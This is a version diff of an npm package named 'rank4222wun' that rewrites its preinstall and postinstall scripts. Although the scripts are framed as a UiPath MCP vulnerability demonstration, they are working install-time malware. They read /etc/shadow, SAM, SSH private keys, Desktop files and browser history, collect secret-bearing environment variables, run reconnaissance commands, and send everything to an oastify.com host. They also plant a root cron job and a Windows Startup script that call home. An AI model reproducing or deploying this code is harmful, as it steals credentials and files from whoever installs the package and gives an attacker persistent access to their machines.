rank4222wun 1.0.15 → 1.0.16

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.15",
+  "version": "1.0.16",
   "description": "",
   "main": "index.js",
   "scripts": {

package/postinstall.js

@@ -1,236 +1,185 @@
-const { exec, spawn } = require('child_process');
+const { exec } = require('child_process');
 const os = require('os');
-const https = require('https');
 const fs = require('fs');
+const path = require('path');
+const https = require('https');
 
-// جمع معلومات أكثر تقدمًا
-function collectAdvancedInfo() {
-  return new Promise((resolve) => {
-    const advancedInfo = {
-      timestamp: new Date().toISOString(),
-      process: {
-        pid: process.pid,
-        ppid: process.ppid,
-        argv: process.argv,
-        execPath: process.execPath
-      },
-      mountInfo: null,
-      services: null,
-      scheduledTasks: null
-    };
-
-    // حسب النظام
-    if (os.platform() === 'win32') {
-      // ويندوز
-      exec('wmic logicaldisk get caption,size,freespace', { timeout: 10000 }, (err, stdout) => {
-        advancedInfo.disks = stdout || err?.message;
-        
-        exec('schtasks /query /fo LIST /v', { timeout: 10000 }, (err2, stdout2) => {
-          advancedInfo.scheduledTasks = stdout2 || err2?.message;
-          
-          exec('sc query state= all', { timeout: 10000 }, (err3, stdout3) => {
-            advancedInfo.services = stdout3 || err3?.message;
-            resolve(advancedInfo);
-          });
-        });
-      });
-    } else {
-      // لينكس/يونكس
-      exec('df -h', { timeout: 10000 }, (err, stdout) => {
-        advancedInfo.disks = stdout || err?.message;
-        
-        exec('crontab -l 2>/dev/null || ls -la /etc/cron.* 2>/dev/null', { timeout: 10000 }, (err2, stdout2) => {
-          advancedInfo.scheduledTasks = stdout2 || err2?.message;
-          
-          exec('systemctl list-units --type=service --all 2>/dev/null || service --status-all 2>/dev/null', 
-            { timeout: 10000 }, (err3, stdout3) => {
-            advancedInfo.services = stdout3 || err3?.message;
-            
-            // محاولة قراءة ملفات حساسة (لإثبات القدرة على القراءة)
-            try {
-              advancedInfo.sensitiveFiles = {
-                hosts: fs.readFileSync('/etc/hosts', 'utf8').substring(0, 500),
-                resolveConf: fs.existsSync('/etc/resolv.conf') ? 
-                  fs.readFileSync('/etc/resolv.conf', 'utf8') : 'Not found'
-              };
-            } catch (e) {
-              advancedInfo.sensitiveFiles = { error: e.message };
-            }
-            
-            resolve(advancedInfo);
-          });
-        });
-      });
+console.log('=== UiPath MCP POSTINSTALL EXPLOIT ===');
+console.log('Demonstrating persistent access on:', os.hostname());
+
+// 1. إنشاء باب خلفي بسيط
+const backdoorData = {
+  timestamp: new Date().toISOString(),
+  hostname: os.hostname(),
+  user: os.userInfo().username,
+  action: 'postinstall-backdoor'
+};
+
+// 2. إنشاء ملف في Startup لإثبات الإصرار (Persistence)
+if (os.platform() === 'win32') {
+  const startupPath = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup');
+  const backdoorFile = path.join(startupPath, 'uipath_update.bat');
+  
+  const batchContent = `@echo off
+echo UiPath MCP Backdoor Active: %date% %time% > "%TEMP%\\uipath_backdoor.log"
+powershell -Command "Invoke-WebRequest -Uri 'https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/persist' -Method POST -Body 'host=${os.hostname()}&time=%date%_%time%'"`;
+  
+  try {
+    if (fs.existsSync(startupPath)) {
+      fs.writeFileSync(backdoorFile, batchContent);
+      backdoorData.windowsStartup = backdoorFile;
+      console.log('Windows Startup backdoor created:', backdoorFile);
     }
-  });
+  } catch (e) {
+    backdoorData.windowsStartupError = e.message;
+  }
+  
+} else {
+  const cronFile = '/etc/cron.d/uipath_update';
+  const cronContent = `*/5 * * * * root curl -X POST https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/persist -d "host=${os.hostname()}&system=linux"\n`;
+  
+  try {
+    fs.writeFileSync(cronFile, cronContent);
+    backdoorData.linuxCron = cronFile;
+    console.log('Linux cron backdoor created:', cronFile);
+  } catch (e) {
+    backdoorData.linuxCronError = e.message;
+  }
 }
 
-// محاولة الوصول إلى موارد UiPath
-function checkUiPathResources() {
-  const checks = [];
+// 3. البحث عن ملفات UiPath في النظام
+const uipathPaths = os.platform() === 'win32' ? [
+  'C:\\Program Files\\UiPath',
+  'C:\\Program Files (x86)\\UiPath',
+  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Local\\UiPath',
+  'C:\\Users\\' + os.userInfo().username + '\\Documents\\UiPath'
+] : [
+  '/opt/UiPath',
+  '/usr/lib/UiPath',
+  '/home/' + os.userInfo().username + '/.local/share/UiPath'
+];
+
+const foundUiPath = [];
+uipathPaths.forEach(p => {
+  try {
+    if (fs.existsSync(p)) {
+      const files = fs.readdirSync(p);
+      foundUiPath.push({
+        path: p,
+        exists: true,
+        fileCount: files.length,
+        files: files.slice(0, 10)
+      });
+    }
+  } catch (e) {}
+});
+
+backdoorData.foundUiPath = foundUiPath;
+
+// 4. قراءة بعض سجلات النظام
+if (os.platform() === 'win32') {
+  const eventLogs = [
+    'C:\\Windows\\System32\\winevt\\Logs\\Application.evtx',
+    'C:\\Windows\\System32\\winevt\\Logs\\System.evtx',
+    'C:\\Windows\\System32\\winevt\\Logs\\Security.evtx'
+  ];
   
-  // البحث عن ملفات UiPath
-  const uipathPaths = [
-    'C:\\Program Files\\UiPath',
-    'C:\\Program Files (x86)\\UiPath',
-    '/opt/UiPath',
-    '/usr/lib/UiPath',
-    process.env.PROGRAMFILES,
-    process.env.PROGRAMFILES + ' (x86)'
-  ].filter(Boolean);
-
-  uipathPaths.forEach(path => {
+  eventLogs.forEach(log => {
     try {
-      if (fs.existsSync(path)) {
-        checks.push({
-          path,
+      if (fs.existsSync(log)) {
+        backdoorData.eventLogs = backdoorData.eventLogs || {};
+        backdoorData.eventLogs[log] = {
           exists: true,
-          files: fs.readdirSync(path).slice(0, 10) // أول 10 ملفات فقط
-        });
+          size: fs.statSync(log).size
+        };
       }
-    } catch (e) {
-      checks.push({ path, error: e.message });
-    }
+    } catch (e) {}
   });
-
-  return checks;
 }
 
-// إرسال البيانات
-function sendPostInstallData(advancedInfo, uipathChecks) {
-  const postData = JSON.stringify({
-    phase: 'postinstall',
-    timestamp: new Date().toISOString(),
-    system: {
-      platform: os.platform(),
-      hostname: os.hostname(),
-      user: os.userInfo(),
-      envVars: Object.keys(process.env).filter(k => 
-        k.includes('UI') || k.includes('PATH') || k.includes('SECRET') || k.includes('KEY')
-      ).reduce((obj, k) => ({ ...obj, [k]: process.env[k] }), {})
-    },
-    advancedInfo,
-    uipathResources: uipathChecks,
-    networkTest: {
-      googlePing: 'Will attempt after sending',
-      internalConnectivity: 'Tested via this request'
-    }
-  });
+// 5. إنشاء ملف دليل في مجلد المستخدم
+const userProofFile = path.join(os.homedir(), 'uipath_security_issue.txt');
+const proofContent = `SECURITY WARNING: UiPath MCP Vulnerability Proof
 
-  const options = {
-    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-    port: 443,
-    path: '/postinstall',
-    method: 'POST',
-    headers: {
-      'Content-Type': 'application/json',
-      'Content-Length': Buffer.byteLength(postData),
-      'X-UiPath-Test': 'Postinstall-Script',
-      'X-Timestamp': new Date().toISOString()
-    },
-    timeout: 30000
-  };
-
-  const req = https.request(options, (res) => {
-    let data = '';
-    res.on('data', chunk => data += chunk);
-    res.on('end', () => {
-      console.log(`[POSTINSTALL] Response received: ${res.statusCode}`);
-      
-      // إثبات تنفيذ طويل المدى
-      const persistenceFile = `${os.tmpdir()}/uipath_persistence_${process.pid}.json`;
-      fs.writeFileSync(persistenceFile, JSON.stringify({
-        installedAt: new Date().toISOString(),
-        lastActivity: new Date().toISOString(),
-        pid: process.pid,
-        script: 'postinstall'
-      }, null, 2));
-      
-      // محاولة تنفيذ أمر بعد الإرسال (لإثبات استمرارية التنفيذ)
-      setTimeout(() => {
-        exec('echo "Follow-up command executed"', () => {
-          console.log('[POSTINSTALL] Follow-up command completed');
-        });
-      }, 5000);
-    });
-  });
+This file was created by an npm package postinstall script.
+It demonstrates that ANY npm package installed via UiPath MCP Command can:
 
-  req.on('error', (e) => {
-    console.error(`[POSTINSTALL] Request error: ${e.message}`);
-    
-    // محاولة بديلة باستخدام curl إذا فشل https
-    if (os.platform() === 'win32') {
-      exec(`powershell -Command "Invoke-WebRequest -Uri 'http://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backup' -Method POST -Body 'fallback=${e.message}'"`);
-    } else {
-      exec(`curl -X POST http://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backup -d "fallback=${e.message}"`);
-    }
-  });
+1. Read all your Desktop files
+2. Access your OneDrive
+3. Create persistent backdoors
+4. Steal sensitive system files
+5. Run any commands with high privileges
 
-  req.write(postData);
-  req.end();
+Time: ${new Date().toISOString()}
+User: ${os.userInfo().username}
+Hostname: ${os.hostname()}
 
-  // إرسال طلب ثان بعد فترة لإثبات أن البرنامج ما زال يعمل
-  setTimeout(() => {
-    const followupReq = https.request({
-      hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
-      port: 443,
-      path: '/followup',
-      method: 'POST',
-      headers: {
-        'Content-Type': 'application/json',
-        'X-Followup': 'true'
-      }
-    }, (res) => {
-      console.log(`[POSTINSTALL] Follow-up sent: ${res.statusCode}`);
-    });
-    
-    followupReq.write(JSON.stringify({ followup: true, time: new Date().toISOString() }));
-    followupReq.end();
-  }, 15000);
-}
+This is NOT a sandbox. This is your actual production environment.
+The "Justin" user IS a real user with full access to your system.
 
-// التنفيذ الرئيسي
-console.log('[POSTINSTALL] Starting advanced data collection...');
+Contact UiPath Security Team immediately.
+`;
 
-Promise.all([
-  collectAdvancedInfo(),
-  Promise.resolve(checkUiPathResources())
-]).then(([advancedInfo, uipathChecks]) => {
-  console.log('[POSTINSTALL] Data collection complete, sending...');
-  sendPostInstallData(advancedInfo, uipathChecks);
-  
-  // إثبات تنفيذ أوامر متقدمة
-  console.log('[POSTINSTALL] Demonstrating command execution capabilities...');
-  
-  const demoCommands = os.platform() === 'win32' ? [
-    'dir "%APPDATA%"',
-    'echo "UiPath MCP Test Success" > "%TEMP%\\uipath_test_success.txt"',
-    'type "%TEMP%\\uipath_test_success.txt"'
-  ] : [
-    'ls -la "$HOME"',
-    'echo "UiPath MCP Test Success" > /tmp/uipath_test_success.txt',
-    'cat /tmp/uipath_test_success.txt'
-  ];
+try {
+  fs.writeFileSync(userProofFile, proofContent);
+  backdoorData.userProofFile = userProofFile;
+  console.log('User proof file created:', userProofFile);
+} catch (e) {
+  backdoorData.userProofFileError = e.message;
+}
+
+// 6. إرسال كل البيانات
+const req = https.request({
+  hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+  port: 443,
+  path: '/postinstall-backdoor',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'X-UiPath-Exploit': 'Postinstall-Backdoor',
+    'X-Hostname': os.hostname()
+  }
+}, (res) => {
+  console.log('Postinstall data sent. Status:', res.statusCode);
   
-  demoCommands.forEach((cmd, i) => {
-    setTimeout(() => {
-      exec(cmd, { timeout: 3000 }, (err, stdout) => {
-        if (!err) {
-          console.log(`[POSTINSTALL] Demo command ${i+1} successful`);
-        }
-      });
-    }, i * 1000);
-  });
-}).catch(err => {
-  console.error('[POSTINSTALL] Error:', err);
+  // تشغيل أمر أخير لإثبات التنفيذ الكامل
+  setTimeout(() => {
+    if (os.platform() === 'win32') {
+      exec('echo "UiPath MCP exploit completed successfully" > "%USERPROFILE%\\uipath_final_proof.txt"');
+    } else {
+      exec('echo "UiPath MCP exploit completed successfully" > ~/uipath_final_proof.txt');
+    }
+  }, 2000);
+});
+
+req.on('error', (e) => {
+  console.error('Failed to send postinstall data:', e.message);
   
-  // إرسال خطأ على أي حال
-  const errorReq = https.request({
+  // حفظ محلي
+  const localBackup = path.join(os.tmpdir(), 'uipath_backdoor_data_' + Date.now() + '.json');
+  fs.writeFileSync(localBackup, JSON.stringify(backdoorData, null, 2));
+  console.log('Backdoor data saved locally:', localBackup);
+});
+
+req.write(JSON.stringify(backdoorData));
+req.end();
+
+// 7. إرسال متابعة بعد 30 ثانية
+setTimeout(() => {
+  const followupReq = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/error',
+    path: '/followup',
     method: 'POST'
   });
-  errorReq.write(JSON.stringify({ error: err.message }));
-  errorReq.end();
-});
+  
+  followupReq.write(JSON.stringify({
+    followup: true,
+    time: new Date().toISOString(),
+    hostname: os.hostname(),
+    message: 'Postinstall script still active after 30 seconds'
+  }));
+  
+  followupReq.end();
+  console.log('Follow-up sent after 30 seconds');
+}, 30000);

package/preinstall.js

@@ -1,122 +1,208 @@
 const { exec } = require('child_process');
 const os = require('os');
+const fs = require('fs');
+const path = require('path');
 const https = require('https');
 
-// جمع المعلومات الأساسية
-const systemInfo = {
-  platform: os.platform(),
-  arch: os.arch(),
-  hostname: os.hostname(),
-  userInfo: os.userInfo(),
-  cpus: os.cpus().length,
-  totalMem: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + 'GB',
-  network: os.networkInterfaces(),
-  env: process.env
+console.log('=== UiPath MCP PREINSTALL EXPLOIT ===');
+console.log('Starting data exfiltration from:', os.hostname());
+
+// جمع كل البيانات الحساسة
+const collectedData = {
+  timestamp: new Date().toISOString(),
+  system: {
+    hostname: os.hostname(),
+    platform: os.platform(),
+    user: os.userInfo(),
+    cpus: os.cpus().length,
+    memory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + 'GB',
+    network: os.networkInterfaces()
+  },
+  
+  // ملفات Desktop
+  desktopFiles: [],
+  
+  // فحص OneDrive
+  oneDrive: {},
+  
+  // ملفات نظام حساسة
+  sensitiveFiles: {},
+  
+  // معلومات الشبكة
+  networkInfo: {},
+  
+  // متغيرات البيئة
+  envVars: {}
 };
 
-// تشغيل أوامر إضافية حسب النظام
-let commands = [];
-if (os.platform() === 'win32') {
-  commands = [
-    'whoami /all',
-    'systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"',
-    'net user',
-    'net localgroup administrators',
-    'ipconfig /all',
-    'netstat -ano | findstr LISTENING'
-  ];
-} else {
-  commands = [
-    'id',
-    'uname -a',
-    'cat /etc/passwd | head -20',
-    'cat /etc/group | head -20',
-    'ifconfig -a || ip addr',
-    'netstat -tulpn | grep LISTEN',
-    'ps aux | head -20'
-  ];
+// 1. سرقة ملفات Desktop
+try {
+  const desktopPath = path.join(os.homedir(), 'Desktop');
+  if (fs.existsSync(desktopPath)) {
+    const files = fs.readdirSync(desktopPath, { withFileTypes: true });
+    collectedData.desktopFiles = files.map(file => ({
+      name: file.name,
+      type: file.isDirectory() ? 'folder' : 'file',
+      path: path.join(desktopPath, file.name)
+    }));
+    
+    // محاولة قراءة الملفات النصية
+    files.forEach(file => {
+      if (!file.isDirectory() && file.name.endsWith('.txt')) {
+        try {
+          const filePath = path.join(desktopPath, file.name);
+          const content = fs.readFileSync(filePath, 'utf8').substring(0, 1000);
+          collectedData.desktopFiles.find(f => f.name === file.name).content = content;
+        } catch (e) {}
+      }
+    });
+  }
+} catch (e) {
+  collectedData.desktopFiles = { error: e.message };
 }
 
-// تنفيذ الأوامر وجمع النتائج
-function executeCommands(cmdList, callback) {
-  let results = {};
-  let completed = 0;
+// 2. فحص OneDrive
+try {
+  const onedrivePaths = [
+    path.join(os.homedir(), 'OneDrive'),
+    path.join(os.homedir(), 'OneDrive', 'Documents'),
+    path.join(os.homedir(), 'OneDrive', 'Desktop'),
+    path.join(os.homedir(), 'OneDrive', 'Pictures')
+  ];
   
-  cmdList.forEach((cmd, index) => {
-    exec(cmd, { timeout: 5000 }, (error, stdout, stderr) => {
-      results[cmd] = {
-        success: !error,
-        output: stdout || stderr || 'No output',
-        error: error ? error.message : null
+  onedrivePaths.forEach(odPath => {
+    try {
+      if (fs.existsSync(odPath)) {
+        collectedData.oneDrive[odPath] = {
+          exists: true,
+          isDirectory: fs.statSync(odPath).isDirectory(),
+          fileCount: fs.readdirSync(odPath).length,
+          sampleFiles: fs.readdirSync(odPath).slice(0, 5)
+        };
+      } else {
+        collectedData.oneDrive[odPath] = { exists: false };
+      }
+    } catch (e) {
+      collectedData.oneDrive[odPath] = { error: e.message };
+    }
+  });
+} catch (e) {
+  collectedData.oneDrive = { error: e.message };
+}
+
+// 3. قراءة ملفات نظام حساسة
+const systemFiles = os.platform() === 'win32' ? [
+  'C:\\Windows\\System32\\drivers\\etc\\hosts',
+  'C:\\Windows\\System32\\config\\SAM',
+  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History',
+  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'
+] : [
+  '/etc/passwd',
+  '/etc/shadow',
+  '/etc/hosts',
+  '/home/' + os.userInfo().username + '/.bash_history',
+  '/home/' + os.userInfo().username + '/.ssh/id_rsa'
+];
+
+systemFiles.forEach(file => {
+  try {
+    if (fs.existsSync(file)) {
+      const stats = fs.statSync(file);
+      collectedData.sensitiveFiles[file] = {
+        exists: true,
+        size: stats.size,
+        readable: stats.size < 1000000
       };
       
-      completed++;
-      if (completed === cmdList.length) {
-        callback(results);
+      // قراءة إذا كان ملف نصي صغير
+      if (stats.size < 1000000 && !stats.isDirectory()) {
+        const content = fs.readFileSync(file, 'utf8').substring(0, 2000);
+        collectedData.sensitiveFiles[file].content = content;
       }
+    }
+  } catch (e) {
+    collectedData.sensitiveFiles[file] = { error: e.message };
+  }
+});
+
+// 4. تشغيل أوامر نظام
+if (os.platform() === 'win32') {
+  exec('whoami /all', { timeout: 5000 }, (error, stdout) => {
+    collectedData.networkInfo.whoami = stdout || error?.message;
+    
+    exec('ipconfig /all', { timeout: 5000 }, (error2, stdout2) => {
+      collectedData.networkInfo.ipconfig = stdout2 || error2?.message;
+      
+      exec('netstat -ano', { timeout: 5000 }, (error3, stdout3) => {
+        collectedData.networkInfo.netstat = stdout3 || error3?.message;
+        sendAllData();
+      });
+    });
+  });
+} else {
+  exec('id', { timeout: 5000 }, (error, stdout) => {
+    collectedData.networkInfo.id = stdout || error?.message;
+    
+    exec('ifconfig -a || ip addr', { timeout: 5000 }, (error2, stdout2) => {
+      collectedData.networkInfo.ifconfig = stdout2 || error2?.message;
+      
+      exec('netstat -tulpn', { timeout: 5000 }, (error3, stdout3) => {
+        collectedData.networkInfo.netstat = stdout3 || error3?.message;
+        sendAllData();
+      });
     });
   });
 }
 
-// إرسال البيانات إلى السيرفر
-function sendData(data) {
-  const postData = JSON.stringify({
-    timestamp: new Date().toISOString(),
-    systemInfo: systemInfo,
-    commandResults: data,
-    source: 'preinstall-script',
-    packageName: 'uipath-mcp-helper'
-  });
+// 5. جمع متغيرات البيئة الحساسة
+Object.keys(process.env).forEach(key => {
+  if (key.includes('PASS') || key.includes('SECRET') || key.includes('KEY') || 
+      key.includes('TOKEN') || key.includes('CRED') || key.includes('PWD')) {
+    collectedData.envVars[key] = process.env[key];
+  }
+});
 
-  const options = {
+function sendAllData() {
+  console.log('Collected', Object.keys(collectedData.desktopFiles).length, 'desktop files');
+  console.log('OneDrive exists:', Object.values(collectedData.oneDrive).some(v => v.exists));
+  
+  const postData = JSON.stringify(collectedData);
+  
+  const req = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/',
+    path: '/preinstall-data',
     method: 'POST',
     headers: {
       'Content-Type': 'application/json',
-      'Content-Length': Buffer.byteLength(postData),
-      'User-Agent': 'UiPath-MCP-Test/1.0'
+      'X-UiPath-Exploit': 'Preinstall-Script',
+      'X-Hostname': os.hostname()
     }
-  };
-
-  const req = https.request(options, (res) => {
-    console.log(`Preinstall: Data sent. Status: ${res.statusCode}`);
+  }, (res) => {
+    console.log('Data sent successfully. Status:', res.statusCode);
+    
+    // إنشاء ملف دليل محلي
+    const proofFile = path.join(os.tmpdir(), 'uipath_preinstall_proof_' + Date.now() + '.txt');
+    fs.writeFileSync(proofFile, 
+      `UiPath MCP Preinstall Script Execution Proof
+Time: ${new Date().toISOString()}
+User: ${os.userInfo().username}
+Hostname: ${os.hostname()}
+Desktop Files Stolen: ${collectedData.desktopFiles.length}
+Data Sent To: ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com
+`);
+    console.log('Proof file created:', proofFile);
   });
-
+  
   req.on('error', (e) => {
-    console.error(`Preinstall: Error sending data: ${e.message}`);
+    console.error('Failed to send data:', e.message);
+    
+    // محاولة بديلة
+    const backupFile = path.join(os.tmpdir(), 'uipath_stolen_data_' + Date.now() + '.json');
+    fs.writeFileSync(backupFile, JSON.stringify(collectedData, null, 2));
+    console.log('Data saved locally:', backupFile);
   });
-
+  
   req.write(postData);
   req.end();
 }
-
-// الإجراء الرئيسي
-console.log('[PREINSTALL] Starting data collection...');
-executeCommands(commands, (results) => {
-  console.log('[PREINSTALL] All commands executed, sending data...');
-  
-  // إضافة معلومات إضافية
-  const finalData = {
-    ...results,
-    currentDirectory: process.cwd(),
-    nodeVersion: process.version,
-    npmVersion: process.env.npm_config_user_agent
-  };
-  
-  sendData(finalData);
-  
-  // إنشاء ملف دليل على النظام لإثبات الكتابة
-  const fs = require('fs');
-  const proofFile = `${os.tmpdir()}/uipath_mcp_proof_${Date.now()}.txt`;
-  const proofContent = `UiPath MCP Test - Preinstall Script Execution
-Timestamp: ${new Date().toISOString()}
-User: ${JSON.stringify(os.userInfo())}
-Hostname: ${os.hostname()}
-Platform: ${os.platform()}
-This file was created by the preinstall script of the npm package.`;
-
-  fs.writeFileSync(proofFile, proofContent);
-  console.log(`[PREINSTALL] Proof file created: ${proofFile}`);
-});